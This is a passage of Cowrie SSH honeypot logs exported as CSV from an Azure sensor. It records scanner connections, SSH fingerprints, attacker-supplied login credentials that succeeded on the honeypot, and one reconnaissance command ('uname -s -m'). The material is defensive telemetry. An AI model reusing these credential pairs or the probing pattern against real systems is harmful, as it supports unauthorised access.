AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""f555226df1963d1d3c09daf865abdc9a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group18-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp256"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""aes192-cbc"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.820076Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:22.309 AM",,"{""eventid"":""cowrie.login.success"",""username"":""user1"",""password"":""3245gs5662d34"",""message"":""login attempt [user1/3245gs5662d34] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:22.308168Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:22.422 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.7138738632202148,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:22.422110Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:22.429 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.1245369911193848,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:22.428499Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:54.906 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""101.126.4.240"",""src_port"":19476,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3928b65a9140"",""protocol"":""ssh"",""message"":""New connection: 101.126.4.240:19476 (10.0.0.4:2222) [session: 3928b65a9140]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:54.905469Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:55.165 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.25769805908203125,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:55.164672Z"",""src_ip"":""101.126.4.240"",""session"":""3928b65a9140""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:56.154 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""101.126.4.240"",""src_port"":19486,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""700ced9a0ee0"",""protocol"":""ssh"",""message"":""New connection: 101.126.4.240:19486 (10.0.0.4:2222) [session: 700ced9a0ee0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:56.153651Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:56.156 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:56.155282Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:56.739 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""98f63c4d9c87edbd97ed4747fa031019"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:56.737227Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:57.526 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""---fuck_you----"",""message"":""login attempt [root/---fuck_you----] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:57.525264Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.071 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.069500Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.072 PM",,"{""eventid"":""cowrie.command.input"",""input"":""uname -s -m"",""message"":""CMD: uname -s -m"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.072154Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.333 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""size"":13,""shasum"":""6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""duplicate"":false,""duration"":0.2629971504211426,""message"":""Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.332159Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.335 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":2.1791365146636963,""message"":""Connection lost after 2 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.334319Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:26:51.918 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":188.06439566612244,""message"":""Connection lost after 188 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:26:51.914454Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:51.590 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""87.236.176.42"",""src_port"":60653,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9a8677747b53"",""protocol"":""ssh"",""message"":""New connection: 87.236.176.42:60653 (10.0.0.4:2222) [session: 9a8677747b53]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:51.588939Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.589 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.9982540607452393,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.588657Z"",""src_ip"":""87.236.176.42"",""session"":""9a8677747b53""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.674 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""87.236.176.42"",""src_port"":35191,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""02d153b61bd2"",""protocol"":""ssh"",""message"":""New connection: 87.236.176.42:35191 (10.0.0.4:2222) [session: 02d153b61bd2]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.673663Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.676 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.675081Z"",""src_ip"":""87.236.176.42"",""session"":""02d153b61bd2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.764 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""0a07365cc01fa9fc82608ba4019af499"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c"",""kex-strict-c-v00@openssh.com""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.762282Z"",""src_ip"":""87.236.176.42"",""session"":""02d153b61bd2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.853 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.17725467681884766,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.852297Z"",""src_ip"":""87.236.176.42"",""session"":""02d153b61bd2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:58:10.833 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""42.240.129.244"",""src_port"":40466,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""0d826c74bc43"",""protocol"":""ssh"",""message"":""New connection: 42.240.129.244:40466 (10.0.0.4:2222) [session: 0d826c74bc43]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:58:10.832542Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:29:24.000 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""20.57.171.170"",""src_port"":57046,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3fc2f9ed3324"",""protocol"":""ssh"",""message"":""New connection: 20.57.171.170:57046 (10.0.0.4:2222) [session: 3fc2f9ed3324]"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:29:23.999154Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:29:24.071 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07033920288085938,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:29:24.070998Z"",""src_ip"":""20.57.171.170"",""session"":""3fc2f9ed3324""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:15:50.427 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.84.89.2"",""src_port"":63058,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3471e950dd1f"",""protocol"":""ssh"",""message"":""New connection: 45.84.89.2:63058 (10.0.0.4:2222) [session: 3471e950dd1f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:15:50.425819Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:15:53.988 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.560526132583618,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:15:53.987946Z"",""src_ip"":""45.84.89.2"",""session"":""3471e950dd1f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:51:46.591 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""112.54.220.94"",""src_port"":36360,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""4b21d59e7368"",""protocol"":""ssh"",""message"":""New connection: 112.54.220.94:36360 (10.0.0.4:2222) [session: 4b21d59e7368]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:51:46.590844Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:53:46.636 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.0426721572876,""message"":""Connection lost after 120 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:53:46.634793Z"",""src_ip"":""112.54.220.94"",""session"":""4b21d59e7368""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:28:41.095 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""207.188.172.51"",""src_port"":55598,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""43c1a5f0a221"",""protocol"":""ssh"",""message"":""New connection: 207.188.172.51:55598 (10.0.0.4:2222) [session: 43c1a5f0a221]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:28:41.094738Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:28:47.282 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":6.185498237609863,""message"":""Connection lost after 6 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:28:47.281505Z"",""src_ip"":""207.188.172.51"",""session"":""43c1a5f0a221""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:29:08.447 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""207.188.172.51"",""src_port"":58294,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""8cece0526130"",""protocol"":""ssh"",""message"":""New connection: 207.188.172.51:58294 (10.0.0.4:2222) [session: 8cece0526130]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:29:08.446441Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:29:11.290 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":2.8417232036590576,""message"":""Connection lost after 2 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:29:11.289538Z"",""src_ip"":""207.188.172.51"",""session"":""8cece0526130""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:48.152 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.185.132.15"",""src_port"":65534,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""57871ad6de73"",""protocol"":""ssh"",""message"":""New connection: 147.185.132.15:65534 (10.0.0.4:2222) [session: 57871ad6de73]"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:48.151232Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:49.068 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:49.066655Z"",""src_ip"":""147.185.132.15"",""session"":""57871ad6de73""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:49.800 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:49.797930Z"",""src_ip"":""147.185.132.15"",""session"":""57871ad6de73""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:51.655 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.5023977756500244,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:51.655004Z"",""src_ip"":""147.185.132.15"",""session"":""57871ad6de73""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:14:26.977 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.0013518333435,""message"":""Connection lost after 120 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:14:26.976765Z"",""src_ip"":""36.138.164.147"",""session"":""b771cfe769f5""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:14:31.221 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.00210070610046,""message"":""Connection lost after 120 